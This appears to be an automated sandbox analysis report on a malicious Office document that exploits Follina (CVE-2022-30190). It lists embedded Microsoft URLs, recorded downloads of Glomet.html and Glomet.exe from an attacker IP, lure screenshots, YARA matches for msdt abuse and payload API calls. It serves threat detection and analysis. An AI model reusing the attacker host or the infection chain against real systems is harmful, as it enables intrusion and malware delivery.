Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://config.edge.skype.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cortana.ai
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cortana.ai/api
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://cr.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dev.cortana.ai
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://devnull.onenote.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://directory.services.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://graph.windows.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://graph.windows.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://invites.office.com/
Source: 678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.dr String found in binary or memory: https://launchpad.net/bugs/1288690
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://lifecycle.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.windows.local
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://management.azure.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://management.azure.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.action.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://messaging.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ncus.contentsync.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://officeapps.live.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://onedrive.live.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://osi.office.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office365.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office365.com/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://roaming.edog.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://settings.outlook.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://staging.cortana.ai
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://tasks.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://wus2.contentsync.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Glomet.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.141.237.18If-Modified-Since: Thu, 14 Jul 2022 16:59:59 GMTIf-None-Match: "80119226a397d81:0"Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /icons/ubuntu-logo.png HTTP/1.1Accept: */*Referer: http://45.141.237.18/Glomet.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.141.237.18Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Glomet.exe HTTP/1.1Host: 45.141.237.18Connection: Keep-Alive
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 29_2_004054B6

System Summary

barindex
Source: Document image extraction number: 0 Screenshot OCR: enable editing" to view content ~ 0 ~ 0 4~~ - m " gm " . ~ ~ m~ ~ Wp 0 0 mb ~ "
Source: Document image extraction number: 1 Screenshot OCR: enable editing" to view content wm "
Source: Screenshot number: 16 Screenshot OCR: enable editing" to view content X Program Compatibility Troubleshooter Detecting issues Cancel
Source: Screenshot number: 20 Screenshot OCR: enable editing" to view content .. . _ ,., Page 1 of 3 0 words 112 O Type here to search m % -
Source: Screenshot number: 24 Screenshot OCR: enable editing" to view content X m Program Compatibility Troubleshooter Cancel 0 words It? O T
Source: Screenshot number: 28 Screenshot OCR: enable editing" to view content X m Program Compatibility Troubleshooter Cancel 0 words It? O T
Source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: 0000000D.00000002.577239005.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: Process Memory Space: msdt.exe PID: 7084, type: MEMORYSTR Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 29_2_004033B3
Source: C:\ProgramData\Glomet.exe Code function: 29_2_0040727F 29_2_0040727F
Source: C:\ProgramData\Glomet.exe Code function: 29_2_00406AA8 29_2_00406AA8
Source: api-ms-win-core-timezone-l1-1-0.dll.29.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.29.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.13.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.mui.13.dr Static PE information: No import functions for PE file found
Source: MsMpRes.dll.29.dr Static PE information: No import functions for PE file found
Source: DiagPackage.dll.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
